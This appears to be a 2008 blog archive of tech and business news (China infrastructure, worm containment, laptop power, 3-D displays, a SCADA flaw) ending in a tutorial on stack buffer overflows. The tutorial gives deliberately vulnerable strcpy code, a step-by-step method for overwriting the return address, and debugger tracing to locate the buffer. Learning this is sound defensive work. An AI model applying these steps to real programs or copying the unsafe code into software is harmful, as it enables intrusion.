Friday, June 13, 2008

5,000 Kilometers of Expressway a Year

Traffic in China

By Dyrk Scherff

June 12, 2008. Canning Wang now owns a car, the first of his life, at the age of 44. He uses it every day to commute to work in the outer districts of Beijing. "The bicycle I used to ride so often, I now only get on at weekends," says Wang.

The small Chinese-built Citroën cost him two years' salary. While in Germany many students already drive their own cars, Wang had to work for more than ten years after university before his dream came true. But examples like Wang's are multiplying fast. It is typical of China's rapidly growing middle class that it can afford a car of its own, and that it actually buys one. Over the past three years the number of cars has risen by 60 percent, yet still only 8 percent of households own their own vehicle.

Salary increases, in some cases of ten percent and more a year, make this rapid growth possible. Average income is close to the threshold of 2,000 euros above which, judging by the experience of other Asian countries, motorization takes off sharply. The land of bicycles and mopeds is becoming the car nation China; four wheels instead of two is the motto. In the cities, the rickshaw is now needed only for tourists.


Freight traffic makes the congestion problem dramatic

For the transport infrastructure, this is an enormous challenge. Even now, cars in multimillion-resident cities such as Beijing and Shanghai often move at jogging pace even on the big eight-lane roads, and that all day long, not just at rush hour. The bicycles in their separate lanes roll comfortably past them. So Wang now has a car, but he is no faster for it. The migration into the cities aggravates the situation further.

It is freight transport, however, that makes the congestion problem truly dramatic. The breakneck growth of China's economy, averaging ten percent a year, also vastly increases the volumes to be transported. And it clogs the roads further, because trucks handle 70 percent of that freight, being cheaper and faster than the railways.

The railways suffer from a lack of terminals where containers can be transferred from truck to rail. Line capacity, too, is far too small. This has consequences: coal shipments for power generation, and before holidays and at weekends passenger services as well, take priority while container trains have to wait, complain Western freight forwarders active in China.

350 billion euros will be invested by 2010

Road traffic can make up for this only on the expressways, which in the densely populated, industrialized east and south reach European standards. "North of Hong Kong they are even built out for the next two decades already," explains Achim Haug, China expert at the Bundesagentur für Außenwirtschaft. The expressways carry tolls. At hefty prices of around 15 euros per 300 kilometers, they evidently also keep some cars away; traffic flows better than in the cities. "The further you travel into western China, though, the worse the road quality becomes, above all once you leave the expressway," says Haug.

The Chinese government has recognized the bottlenecks and is investing enormous sums so that they do not become an obstacle to China's further economic rise. The dimensions are barely imaginable for Germans. In the current five-year plan covering 2006 to 2010, 350 billion euros are flowing into expanding the transport infrastructure, twice as much as in the previous five years. For comparison: Germany will spend 56 billion euros on construction in the same period, and the entire 2008 federal budget amounts to just 280 billion.

No other country in the world can keep pace with China's tempo. Even fast-growing India invests only half as much. Among the world's emerging economies, China already accounts for 40 percent of all infrastructure spending. Never in history has a country poured so much into transport projects. It exceeds even the dimensions of the railway euphoria that industrialization triggered in nineteenth-century Britain. China is now retracing Europe's development, only far faster and more dynamically.

The west is to be opened up better, too

The Chinese work at immense speed. Thanks to fast planning with no right of objection for the public, the country completes almost 5,000 kilometers of new expressway a year, building in three years as much as exists in Germany altogether. The network now spans 53,000 kilometers and is already the second largest in the world after that of the United States. Ten years ago, China had just 7,000 kilometers.

The goal of expanding the transport infrastructure is not only to eliminate bottlenecks in the east. The west is to be opened up better, too. For political reasons, to let more regions and people share in the country's economic success; "building a harmonious society" is what the government calls this. And for economic reasons: in the east, high land prices, sharply rising wages and a shortage of skilled workers are becoming a problem and forcing parts of industry to migrate to the cheaper west, where wages are only ten percent of eastern levels. Road and rail follow the economy.

Finally, the investments are also meant to push the railways forward at last. They stand before a renaissance, and things are moving at much the same pace as in road construction. From 2006 to 2010, 17,000 kilometers of new track will be built; in Germany it will be fewer than 200. Some gigantic projects are already finished, such as the 1,100-kilometer line to Tibet, which became very expensive because of its extreme altitude in the mountains of the Himalayas. A further stretch of more than a thousand kilometers to the northwest, straight through the mountains of the annexed province, is planned. Just as bold is a planned 150-kilometer sea bridge to Taiwan, should political relations between the two countries continue to ease.

The German ICE will soon link Beijing and Shanghai

Also under construction is a 10,000-kilometer high-speed network in the east of the country, on which passenger trains will race along at up to 350 kilometers per hour. So far, at most 200, in exceptional cases 250, kilometers per hour are possible. The new lines will free up the urgently needed capacity for freight on the existing tracks.

In early August, shortly before the start of the Olympic Games, a small part of the network goes into operation and becomes China's fastest line to date. It links Beijing with the coastal city of Tianjin, where the sailing competitions will be held. The German ICE will run on this line at 300 kilometers per hour. In 2009 it will also serve the new line between Beijing and Shanghai. The government has ordered 60 trains. Units of the Japanese Shinkansen bullet train and a Bombardier model already run through the east.

The infrastructure boom has so far not brought a breakthrough for the German Transrapid maglev train, however. It still runs only on a few kilometers of track in Shanghai. The long-discussed and vaguely agreed extension into the megacity's center and on to Hangzhou has still not been finally approved. Most recently, residents' complaints over noise fears held up a government decision. German experts in Beijing expect a decision only after the Olympic Games, or possibly not until after the Expo 2010 world's fair in Shanghai, because the leadership wants to avoid fresh public protests ahead of these two major events. The Transrapid consortium has long been waiting for the extension in order to improve the train's international marketing prospects.

Within five years, China is building 44 airports

Rail and road account for about 80 percent of total transport investment from 2006 to 2010. Also important for exports are the ports on the east coast, which connect the country to the rest of the world. Three of the four largest container ports on earth already lie in China. With volume growth of more than 20 percent a year, they are likely to displace Singapore from first place by next year at the latest. Billions are therefore being invested here as well.

The same goes for the airports. While in Germany the planning for the new runway at Frankfurt airport alone took ten years, China builds several complete airports in less time, above all in the west. Forty-four new airfields will be completed between 2006 and 2010, bringing the country's total to 186, and ten existing ones will be expanded as well. Beijing is likely to become a major hub for all of Asia. In passenger numbers, its airport has drawn level with Frankfurt. The just-opened Terminal 3, designed in the shape of a dragon by star architect Norman Foster, plays a large part in that. Guests of the Olympic Games arriving from abroad will provide a further special boost. Only in the freight business do China's airports still lag far behind, though they are growing fast, at up to 30 percent a year. They could benefit from China's ambition to produce more high technology, which is preferably shipped by air.

China can afford all these gigantic investments in transport infrastructure only because the economic boom is making tax revenues flow freely. The budget deficit fell from 2.6 percent in 2002 to almost zero today. That opens up greater financial leeway, but it is not enough. The government also wants to raise funds by bringing in private companies, above all from abroad.

These include banks and insurers that take stakes in infrastructure companies such as the listed railway builder China Railway Group, the expressway operator Shenzhen Expressway or the port operator Dalian Port. Or Deutsche Bahn, which through its logistics subsidiary DB Schenker is helping to build 18 container terminals in China. "That is how we get onto the rails the transport volumes we need to run the planned rail land bridge between Asia and Europe economically," is how Deutsche Bahn chief Hartmut Mehdorn sums up its importance for his company.

Canning Wang takes little interest in such construction projects with a global backdrop. He is still stuck in Beijing traffic in his Citroën, hoping that things will soon start moving in the capital too, in the literal sense of the word. The hope is well founded. By 2020 the length of the subway network will quintuple, to 560 kilometers. No city in the world will then have more. That may clear some space on the roads, so that Wang finally gets somewhere.

German companies supply trains, fasten rails and equip airports

Siemens

The Munich-based group is surely the biggest German beneficiary of the huge transport investments in China. By 2010, Siemens will deliver 60 Velaro high-speed trains, a somewhat wider and faster version of the ICE 3 that runs in Germany between Cologne and Frankfurt, for example. They can travel at up to 350 kilometers per hour and are built in a joint venture in China, though the key components such as the drive system come from Germany. Siemens is taking in 670 million euros from the deal. The first five trains will be in service from August on the line between Beijing and the coastal city of Tianjin, for which the company has also supplied the signaling and communications technology. In 2007, China additionally ordered 500 electric freight locomotives worth 334 million euros. Siemens is also equipping, for 30 million euros, the subway line that leads to Beijing's Olympic grounds. In the past, the company already installed the signaling and operations-control technology for several Chinese subway systems and supplied metro cars. It is also hoping for the extension of the Transrapid line in Shanghai, for which it would supply the electronic equipment.

Thyssen-Krupp

The group is the other partner in the Transrapid consortium and is responsible for the magnetic propulsion system. Beyond that, passengers in the new Terminal 3 of Beijing's airport ride elevators and escalators made by Thyssen-Krupp, which have also been installed in railway stations. Air travelers in Beijing and Shanghai likewise board their planes over Thyssen passenger boarding bridges. The company is the first supplier worldwide to build and install boarding bridges for the new giant Airbus A380.

Vossloh

The rail-technology supplier makes the fastening clips that bond the rails firmly to the concrete sleepers on two high-speed lines. They are produced in the company's own plant in China. The order is enormously important for the Vossloh Fastening division: at a volume of 185 million euros, it accounts for more than 40 percent of the division's revenue over the two-year contract period. For the group as a whole, it still amounts to a good 7 percent.

Containing Internet Worms

Thursday, June 12, 2008

A new method could stop Internet worms from spreading.

By Erica Naone

The spread of Internet worms could be stopped early on by using a new method to watch computers for the behavior exhibited by infected hosts, according to research recently published in IEEE Transactions on Dependable and Secure Computing. Although other methods exist to protect against worms, the new strategy is designed to minimize interference with users' normal work patterns, says Ness Shroff, a professor in the electrical-engineering department at Ohio State University, who was involved in the research. The researchers envision the technique being used in corporate networks, where it could identify computers that need to be quarantined and checked for infection.

Internet worms can be enlisted to launch denial-of-service attacks, which flood a website so that legitimate users can't access it, or install back doors that can be used to create botnets. Large numbers of infected computers could significantly slow Internet traffic, even if the worms do nothing more than spread.

The Purdue University and Ohio State method of preventing worms from spreading works primarily for a class of worms that scans the Internet randomly in search of vulnerable host machines to infect. One such worm was Code Red, which infected more than 359,000 computers in less than 14 hours in 2001, and ultimately caused an estimated $2.6 billion in damages. Although this type of worm has been around for some time, Kurt Rohloff, a scientist in the distributed systems technology group at BBN Technologies, says that it is still dangerous. These "are a very simple class of worms that's very easy to develop and program, but at the same time, they're not as easy to contain," he says. "If we could understand these fairly simple but still problematic worms, we could hopefully address the more so-called devious worms."

The researchers base their strategy on a new model that they designed for how worms spread. Many existing models are based on an analogy to the spread of epidemics, Shroff says, but they are more accurate at later stages of an infection. The researchers' model was particularly designed for accuracy in the early stages of infection, and it revealed that the key to whether or not a worm can spread successfully is the total number of times that an infected host scans the Internet in attempts to find new hosts to infect.

While other methods of containing worms have focused on monitoring computers for changes in the rate at which they scan the Internet from moment to moment, Shroff says that this can interfere with users' daily activities. "Scan rates fluctuate a lot, so if you go online, you may scan a lot of times during a very short period of time, and then not scan at all," he says. "We felt that the scan rate was too restrictive and could interfere with the normal operation of the network." By monitoring the volume of scans over a longer period of time, he says, it's possible to contain worms while keeping the threshold too high for ordinary users to raise alarms. Software could monitor the number of scans each computer on a network sends and quarantine any computers that exceed that number. Shroff hopes that changing the criteria for suspecting infection in this way will reduce the likelihood that legitimate scans of the Internet would be flagged as worm activity.
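The cumulative-count approach described above can be sketched in a few lines. The following is a hypothetical illustration, not the researchers' implementation; the threshold value, struct, and function names are invented for the example. The point is that the counter never resets within the monitoring window, so bursty but modest user activity stays below the bar while a worm's relentless scanning eventually crosses it:

```c
#include <assert.h>
#include <stdbool.h>

/* Assumed threshold: chosen far above normal user scanning so that
 * legitimate bursts do not trigger quarantine. Not from the paper. */
#define SCAN_THRESHOLD 10000L

typedef struct {
    long total_scans;   /* cumulative scans over the monitoring window */
    bool quarantined;
} host_monitor;

/* Record a batch of outbound scans from one host; returns true once
 * the cumulative total crosses the threshold and the host should be
 * quarantined and checked for infection. */
bool record_scans(host_monitor *h, long scans)
{
    h->total_scans += scans;
    if (h->total_scans > SCAN_THRESHOLD)
        h->quarantined = true;
    return h->quarantined;
}
```

A short burst of scanning leaves the host untouched; only sustained worm-like volume trips the quarantine flag.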

"In a sense, what we're doing is taking advantage of the fact that this worm is trying a lot of things and missing many times, and each time it misses, it's giving out some information," Shroff says. Although the system is designed for dealing with scanning worms that seek vulnerable hosts at random, the researchers have also adapted it for worms that target their attacks at specific local networks.

Shroff believes that the system could best be deployed on corporate networks, particularly in situations in which extra computers are available that could cover a workload while possibly infected computers are examined. It might not work as well for small businesses or on home networks, because taking a computer offline could be too large of a disruption for users, he says.

Rohloff says that he could imagine such a system being effective, but he cautions, "The bias, of course, would be that it would protect local networks from infections that are already present in the network. It wouldn't do as much for protecting networks from infections that come from the outside." He adds that while the researchers' model and initial simulations look good, he would be curious to see a more thorough analysis of how often the system suspects a computer of being infected with a worm when no worm is actually present.

The Purdue and Ohio State researchers suggest that future work could search for ways to adapt their tools for ever more targeted worms. Shroff says that while he and his colleagues are now concentrating on stopping worms at the level of host computers, another possible direction could be to make software that would allow routers to watch for suspicious traffic patterns. While such an approach could allow a relatively large number of computers to be monitored from a single point, it would also require significant changes to how routers operate. While they currently keep track of only the destination of Internet traffic, they would have to begin keeping track of its source as well.

Doubling Laptop Battery Life

Friday, June 13, 2008

Intel's new integrated power management could dramatically reduce power consumption in your laptop by shutting down components that are not in use.

By Kate Greene

Anyone who uses a laptop on an airplane would love a single battery to last through a trans-American flight. Now researchers at Intel believe that they can double a laptop's battery life without changing the battery itself. Instead, they would optimize power management--system wide--of the operating system, screen, mouse, chips inside the motherboard, and devices attached to USB ports.

To be sure, manufacturers and researchers have been exploring piecemeal ways to make portable computers more energy efficient. Operating systems are designed to deploy power-saving screen savers and put an entire system to sleep if its owner hasn't used it for a while. And Intel's forthcoming Atom, a microprocessor for mobile Internet devices, can be put to sleep at up to six different levels, depending on the types of tasks that it needs to do.

But the problem with these approaches is that they're not coordinated across the entire device. Intel's prototype power-management system is aware of the power that's used by all parts of a laptop, as well as the power requirements of a person's activity, and it shuts down operations accordingly, says Greg Allison, business development manager. The project, called advanced platform power management, was demonstrated on Wednesday at an Intel event in Mountain View, CA.

Power bars: Intel Research engineers yesterday showed off prototype methods for system-wide laptop power savings. Using the current implementation, average power consumption of a laptop can be reduced from 6.23 to 4.02 watts. The researchers believe that the approach has the capacity to slash up to 50 percent of laptop power consumption.
Credit: Kate Greene

Allison gives this example: today, when a person reads a static e-mail, the screen still refreshes 60 times a second, and peripherals such as the keyboard, mouse, and USB devices drain battery power while awaiting instructions. "We're burning energy even when we don't need to," Allison says. In this situation, Intel's system would save power by essentially taking a snapshot of the screen that a person is reading and saving it to a buffer memory. So instead of refreshing, the screen would maintain an image until a person tapped a button on the keyboard or moved the mouse (the keyboard and mouse would also stay asleep until activated).

All the while, the operating system will be monitoring use of other applications, restricting the activity of those that aren't being actively used. And if there are any devices plugged into a USB port, such as a flash-memory stick, the system would put them to sleep. At the same time, explains Allison, energy-monitoring circuits on Intel chips will put unnecessary parts of the microprocessor to sleep. It takes 50 milliseconds for the entire system to spring to life, he says, a length of time imperceptible to the user.

Intel isn't the first to think of the idea of integrating power-saving technology throughout a device. One Laptop per Child (OLPC), the nonprofit that builds inexpensive, rugged laptops meant for children in the developing world, set the standard with a gadget that consumes one-tenth of the power of a conventional laptop. Granted, OLPC's laptop doesn't have the capabilities of consumer machines, but it does show what is technically achievable.

There are definitely advantages to this systemic approach, says Seth Sanders, a professor of electrical engineering and computer science at the University of California, Berkeley. "Comprehensively looking through the system at all of the different pieces that are cycling unnecessarily provides an opportunity [for power savings]," he says.

Allison says that the company is already talking with operating-system vendors to explore what it would take to integrate this approach into software. And as a major contributor to the new USB 3.0 standards, Intel will have some say in how much power forthcoming USB devices will use. In addition, Allison says, the company is trying to secure deals with display and hardware vendors. "This won't happen in the next three years," he says. But he suspects that pieces of the new power-management system will find their way into laptops within five years.



Thursday, June 12, 2008

3-D Viewing without Goofy Glasses


Philips's new displays bring high-quality, 3-D images a step closer to your living room.

By John Borland

With the release of a new set of 3-D video screens next week, Philips Electronics is bringing a sci-fi cinema standby a little closer to everyday use. Philips' WOWvx displays--which allow viewers to perceive high-quality 3-D images without the need for special glasses--are now beginning to appear in shopping malls, movie-theater lobbies, and theme parks worldwide.

The technology uses image-processing software, plus display hardware that includes sheets of tiny lenses atop LCD screens. The lenses project slightly different images to viewers' left and right eyes, which the brain translates into a perception of depth. For now, the screens are expensive and not yet marketed for home use. But Philips, which first released the technology in 2006, is working on technical improvements that will make the screens better suited for the home.

"We think this is a huge leap," says Wolf-Nils Malchow, production manager for the Munich-based Kuk Filmproduktion, an early producer of content for the displays and of promotional films for clients such as Deutsche Telekom. "It is a bit like a few years ago, when [high-definition video] kicked in. Everyone is excited about it."

Small-screen 3-D: This is an artistic rendering of WOWvx 3-D screens, which are coated with lenses that project slightly differing images, allowing viewers to perceive depth without wearing 3-D glasses.
Credit: Courtesy of Philips

A planned deployment of about 50 screens in U.S. theater lobbies has begun at the Bridge Theater in Los Angeles. South African shopping malls have ordered about 350 of the screens. Other rollouts include malls and coffee shops in Russia, European casinos, and theme parks, the company says. And at next week's Infocomm trade fair in Las Vegas, new 52-inch and 22-inch options will be added to the existing 42-inch model.

This isn't the first time that 3-D has made a splash. The early 1950s and early 1980s each saw their own fads. The 3-D movies of the 1950s were filmed with two cameras, with the separate images then projected simultaneously. The familiar red-and-blue-lensed glasses were used to trick the eyes into interpreting color differences as distance. Modern 3-D movies employ more-sophisticated approaches, such as projecting the separate images in polarized light and using glasses with polarized lenses that filter out one image on each side.

But a combination of advances in computer image processing and industrial optics has allowed companies like Philips to develop their glasses-free technique.

As with earlier techniques, the illusion requires specially created content to start with. In this case, a digital movie file effectively has two frames for each ordinary movie frame. The first is an ordinary color image, identical to what would be seen on a two-dimensional screen. A second frame, rather than showing a second offset view, encodes information about how viewers should perceive depth in the first frame. It appears as a grayscale version of the first, with white indicating foreground objects, black denoting deep background, and shades of gray indicating points in between.

Capturing 3-D: Philips's WOWvx screens require specially created videos that record two frames for each scene. The first frame contains ordinary color information. The second frame contains depth information for each pixel, with white denoting foreground and black indicating deep background. Software and hardware built into the screens then use this information to create differing versions of images as the video plays and send them to the display. In a final step, lenses atop the screen project these slightly-differing images so that the left and right eyes see different versions, creating the illusion of depth.
Credit: Courtesy of Philips

Then, special PC-based hardware and software--housed in the display itself--processes the pair of images as the video is played. The information in the second frame is used to transform the original color frame into nine separate images, each slightly offset from the last, as though the camera had been moved a few inches to the side each time. All nine are then sent to the screen.
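The per-pixel transformation that turns one color-plus-depth pair into offset views can be sketched for a single scan line. This is an illustrative approximation of depth-image-based rendering, not Philips's actual algorithm; the shift formula, function name, and parameters are assumptions. Near pixels (white in the depth map, value 255) are displaced more between adjacent views than far pixels (black, value 0), mimicking a camera moved sideways:

```c
/* Synthesize one of nine views (view = 0..8) for a single scan line.
 * Pixels are shifted right in proportion to their depth value and the
 * view index; positions left uncovered become background holes. */
void synthesize_view(const unsigned char *color, const unsigned char *depth,
                     unsigned char *out, int width, int view, int max_shift)
{
    for (int x = 0; x < width; x++)
        out[x] = 0;                         /* initialize: background fill */
    for (int x = 0; x < width; x++) {
        /* displacement grows with nearness (depth) and view index */
        int shift = (depth[x] * max_shift * view) / (255 * 8);
        int nx = x + shift;
        if (nx >= 0 && nx < width)
            out[nx] = color[x];             /* later writes win on overlap */
    }
}
```

A real renderer would also fill the holes that opening up the foreground leaves behind; the sketch simply leaves them as background.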

To allow viewers to perceive these images, the LCD screens are overlaid with three-pixel-wide cylindrical lenses that direct the different images into side-by-side paths. A nearby viewer will see one of these images with each eye--the first and third, or third and fifth, for example--thus producing the illusion of image depth.

The multiple images allow viewers to walk around the viewing area--a cone about 20 degrees wide--without disturbing the 3-D illusion, says Philips product manager Erik van der Tol. This cone is duplicated several times on each screen, further widening the 3-D viewing area.

The number of content producers working with the format is small, but growing. Kuk creates live-action stereoscopic films, using two cameras to film. Others, such as the London-based SquareZero, work primarily with computer graphics, which requires a less specialized production process.

"You do get really good depth perception," says SquareZero head of animation Olly Tyler. "The image seems to go into the screen and come out of it."

As with any new technology, there are glitches. With the company's 42-inch screens, the 3-D effect works most effectively only up to a distance of about 12 feet, and if you view the screen at the boundary between the three "cones," you experience garbled images. In addition, the quality of ordinary two-dimensional images on the screens is diminished. Finally, a 42-inch screen will set you back $12,000 (prices on the new 52-inch and 22-inch models being released next week have not yet been specified).

Still, while today the company is focusing squarely on the advertising and display market, it does have its eye on the consumer market. Researchers are working on expanding and smoothing the viewing area and on improving the two-dimensional viewing quality in order to make the screens entirely backward-compatible with ordinary video.

"Look a couple of years ahead, and I think this will be an acceptable technology for the home," says van der Tol. "The Hollywood scene is definitely interested." Philips is not alone; Sharp Electronics, along with a handful of small companies such as Dimension Technologies and Alioscopy, offer competing products.

Security hole exposes utilities to Internet attack

Wednesday, June 11, 2008

By Associated Press

SAN FRANCISCO (AP) _ Attackers could gain control of water treatment plants, natural gas pipelines and other critical utilities because of a vulnerability in the software that runs some of those facilities, security researchers reported Wednesday.

Experts with Boston-based Core Security Technologies, who discovered the deficiency and described it exclusively to The Associated Press before they issued a security advisory, said there's no evidence anyone else found or exploited the flaw.

Citect Pty. Ltd., which makes the program called CitectSCADA, patched the hole last week, five months after Core Security first notified Citect of the problem.

But the vulnerability could have counterparts in other so-called supervisory control and data acquisition, or SCADA, systems. And it's not clear whether all Citect clients have installed the patch.

SCADA systems remotely manage computers that control machinery, including water supply valves, industrial baking equipment and security systems at nuclear power plants.

Customers that use CitectSCADA include natural gas pipelines in Chile, major copper and diamond mines in Australia and Botswana, a large pharmaceutical plant in Germany and water treatment plants in Louisiana and North Carolina.

For an attack exploiting the vulnerability that Core Security revealed Wednesday to succeed, the target network would have to be connected to the Internet. That violates industry policy but happens anyway when companies have lax security practices, such as connecting control-system computers and Internet-facing computers to the same routers.

A rogue employee could also access the system internally.

Security experts say the finding highlights the possibility that hackers could cut the power to entire cities, poison a water supply by disrupting water treatment equipment, or cause a nuclear power plant to malfunction by attacking the utility's controls.

That possibility has grown in recent years as more of those systems are connected to the Internet.

The Citect vulnerability is of a common type. Called a "buffer overflow," it allows a hacker to gain control of a program by sending a computer too much data.

"It's not a very elaborate problem," Ivan Arce, Core Security's chief technology officer, said in an interview. "If we found this thing -- and this was not that hard -- it would be easy for someone else to do it."

Citect is a subsidiary of French power-equipment giant Schneider Electric SA. Company representatives did not return repeated calls for comment.

Citect said in a statement included in Core Security's advisory that customers should isolate their SCADA systems entirely from the Internet or make sure they use firewalls and other technologies to prevent the systems from talking to the outside world.

Normally, the facilities that use SCADA systems fix flaws privately and very little is revealed publicly about any problems.

What's clear is that such control systems are increasingly vulnerable to Internet-borne threats, since viruses and worms have disrupted service in power plants, automobile factories and gasoline pipelines -- even when those facilities weren't targeted.

Alan Paller, director of research for the SANS Institute, which operates the Internet Storm Center, an early warning system for computer attacks, said Core Security Technologies' discovery shows many major facilities may remain vulnerable.

"It dashes the defense of, 'We're different, we don't have that kind of problem,'" Paller said. "That's why this is significant."

--------------------------------------------------------------------------------------------

What causes the buffer overflow condition? Broadly speaking, a buffer overflow occurs whenever a program writes more information into a buffer than the space allocated for it in memory. This allows an attacker to overwrite data that controls the program's execution path and hijack control of the program to execute the attacker's code instead of the process code. For those who are curious to see how this works, we will now examine the mechanism of this attack in more detail and also outline certain preventive measures.

From experience we know that many have heard about these attacks, but few really understand their mechanics. Others have only a vague idea, or none at all, of what a buffer overflow attack is. There are also those who consider this problem to fall under a category of secret wisdom and skills available only to a narrow segment of specialists. In reality, however, it is nothing but a vulnerability brought about by careless programming.

Programs written in the C language, where more focus is given to programming efficiency and code length than to security, are the most susceptible to this type of attack. C is considered a very flexible and powerful language, but this strength can become a headache for novice programmers: it allows pointer-based direct memory access, and even among the library functions that operate on text strings there are some that do not check the length of the real buffer, making them susceptible to overflowing its declared length.

Before attempting any further analysis of the mechanism by which the attack progresses, let us develop a familiarity with some technical aspects regarding program execution and memory management functions.

Process Memory

When a program is executed, its various compilation units are mapped in memory in a well-structured manner. Fig. 1 represents the memory layout.

Fig. 1: Memory arrangement

Legend:

The text segment contains primarily the program code, i.e., a series of executable program instructions. The next segment is an area of memory containing both initialized and uninitialized global data; its size is fixed at compilation time. Going further into the memory structure toward higher addresses, we have a portion shared by the stack and heap, which are allocated at run time. The stack is used to store function call arguments, local variables and the values of selected registers, allowing the program state to be retrieved. The heap holds dynamic variables; to allocate memory on it, a program uses the malloc function or the new operator.

What is the stack used for?

The stack works according to a LIFO (Last In, First Out) model. Since space within the stack is allocated for the lifetime of a function, only data that is active during that lifetime can reside there. This kind of structure follows naturally from the structural approach to programming, where code is split into many sections called functions or procedures. When a program runs, it sequentially calls individual procedures, often one from within another, producing a multi-level chain of calls. Upon completion of a procedure, the program must continue execution with the instruction immediately following the CALL instruction. In addition, because the calling function has not yet terminated, all of its local variables, parameters and execution status must be "frozen" so that it can resume immediately after the call returns. A stack implementation guarantees exactly this behavior.

Function calls

The program works by sequentially executing CPU instructions. For this purpose the CPU has the Extended Instruction Pointer (the EIP register) to maintain the sequence order. It controls the execution of the program, indicating the address of the next instruction to be executed; running a jump or calling a function, for example, causes this register to be modified accordingly. Now suppose an attacker could load the address of his own code into EIP: the CPU would simply proceed with executing it. What would happen then?

When a procedure is called, the return address needed to resume execution after the call is pushed onto the stack. From the attacker's point of view, this is a situation of key importance: if the attacker somehow managed to overwrite the return address stored on the stack, then upon termination of the procedure it would be loaded into the EIP register, potentially allowing arbitrary overflow code to be executed instead of the code that would normally follow. We can see how the stack behaves once the code of Listing 1 has been executed.

Listing 1

void f(int a, int b)

{

char buf[10];

// <-- the stack is watched here

}

void main()

{

f(1, 2);

}

After the function f() is entered, the stack looks like the illustration in Figure 2.

Fig. 2 Behavior of the stack during execution of a code from Listing 1

Legend:

Firstly, the function arguments are pushed onto the stack in reverse order (in accordance with the C calling convention), followed by the return address. From this point on, the function f() is executing: it pushes the current EBP content (EBP will be discussed below) and then allocates a portion of the stack for its local variables. Two things are worth noticing. Firstly, the stack grows downwards in memory as it gets bigger. It is important to remember this, because a statement like:

sub esp, 08h

which causes the stack to grow, may seem confusing. In fact, the bigger ESP gets, the smaller the stack size, and vice versa: an apparent paradox.

Secondly, whole 32-bit words are pushed onto the stack. Hence, a 10-character array actually occupies three full words, i.e. 12 bytes.

How does the stack operate?

There are two CPU registers of vital importance for the functioning of the stack; they hold the information necessary for referencing data residing in memory. They are ESP and EBP. ESP (the Stack Pointer) holds the address of the top of the stack. It can be modified either directly or indirectly: directly, since arithmetic operations can be executed on it (for example, add esp, 08h, which shrinks the stack by 8 bytes, i.e. two words); indirectly, by adding or removing data elements with each successive PUSH or POP operation. The EBP register is the base (static) register that points to the bottom of the current stack frame. More precisely, it contains the address of the stack bottom as an offset base for the executing procedure. Each time a new procedure is called, the old value of EBP is the first thing pushed onto the stack, and then the current value of ESP is moved into EBP. This new value held by EBP becomes the reference base for the local variables within the stack section allocated for the function call {1}.

Since ESP points to the top of the stack, it changes frequently during the execution of a program, which makes it very cumbersome to use as an offset reference register. That is why EBP is employed in this role.

The threat

How do we recognize where an attack may occur? We know that the return address is stored on the stack, and that data is also handled in the stack. Later we will see what happens to the return address when these two facts are combined under certain circumstances. With this in mind, let us experiment with the simple application in Listing 2.

Listing 2

#include <string.h>

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes

void main()

{

char buf[8];

strcpy(buf, code);

}

When executed, the above application causes an access violation {2}. Why? Because an attempt was made to fit a 16-character string into an 8-byte space (which is entirely possible, since no bounds checking is carried out). Thus, the allocated memory space has been exceeded and the data at the stack bottom is overwritten. Look once again at Figure 2: such critical data as both the saved frame address and the return address get overwritten (!). Upon returning from the function, the modified return address is loaded into EIP, the program proceeds to the address it points to, and a stack execution error results. So, corrupting the return address on the stack is not only feasible, but trivial when "enhanced" by programming errors.

Poor programming practices and buggy software provide a huge opportunity for a potential attacker to execute malicious code of his own design.

Stack overrun

We must now sort out all this information. As we already know, the program uses the EIP register to control execution. We also know that upon calling a function, the address of the instruction immediately following the call is pushed onto the stack, then popped into EIP when the return is performed. We have ascertained that the saved EIP can be modified while it sits on the stack, by overwriting the buffer in a controlled manner. Thus, an attacker has everything needed to point EIP at his own code and get it executed in the context of the victim process.

Roughly, the algorithm to effectively overrun the buffer is as follows:

1. Finding code that is vulnerable to a buffer overflow.

2. Determining the number of bytes needed to overwrite the return address.

3. Calculating the address at which to point the alternate code.

4. Writing the code to be executed.

5. Linking everything together and testing.

The following Listing 3 is an example of a victim’s code.

Listing 3 – The victim’s code

#include <stdio.h>

#include <string.h>

#define BUF_LEN 40

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argc > 1)

{

printf("\nbuffer length: %d\nparameter length: %d", BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

}

This sample code has all the characteristics of a potential buffer overflow vulnerability: a local buffer and an unsafe function that writes the value of the first command-line parameter into memory with no bounds checking employed.

Putting our newfound knowledge to use, let us work through a sample attacker's task. As we ascertained earlier, spotting a code section potentially vulnerable to a buffer overflow is simple. The source code (if available) may be helpful; otherwise we can just look for something critical in the program to overwrite. The first approach focuses on searching for string-based functions like strcpy(), strcat() or gets(). Their common feature is that they perform unbounded copy operations, i.e. they keep copying until a NULL byte (code 0) is found. If, in addition, such a function operates on a local buffer and there is a possibility of redirecting the process execution flow to anywhere we want, an attack becomes feasible. Another approach is trial and error: stuffing an inconsistently large batch of data into any available input. Consider the following example:

victim.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If the program returns an access violation error, we may simply move on to step 2.

The problem now is to construct a string large enough to overflow the buffer and effectively overwrite the return address. This step is also very easy. Remembering that only whole words can be pushed onto the stack, we simply construct the following string:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU.............

If successful, in terms of potential buffer overflow, this string will cause the program to fail with the well-known error message:

The instruction at "0x4b4b4b4b" referenced memory at "0x4b4b4b4b". The memory could not be "read".

The only conclusion to be drawn is that since the value 0x4b is the capital letter "K" in ASCII, the return address has been overwritten with "KKKK". Therefore, we can proceed to Step 3. Finding the beginning address of the buffer in memory (and thus of the injected shellcode) will not be easy. Several methods can be used to make this "guessing" more efficient; we will discuss one now and explain the others later. For the moment, we obtain the necessary address by simply tracing the code. After starting the debugger and loading the victim program, we proceed. The initial concern is to get through a series of system function calls that are irrelevant to this task. A good method is to trace the stack at runtime until the input string characters appear in succession. Perhaps two or more attempts will be required before finding code similar to that shown below:

:00401045 8A08 mov cl, byte ptr [eax]

:00401047 880C02 mov byte ptr [edx+eax], cl

:0040104A 40 inc eax

:0040104B 84C9 test cl, cl

:0040104D 75F6 jne 00401045

This is the strcpy function we are looking for. On entry to the function, the memory location pointed to by EAX is read, and (next line) its value is moved into the memory location pointed to by the sum of the registers EAX and EDX. By reading the contents of these registers during the first iteration we can determine that the buffer is located at 0x0012fec0.

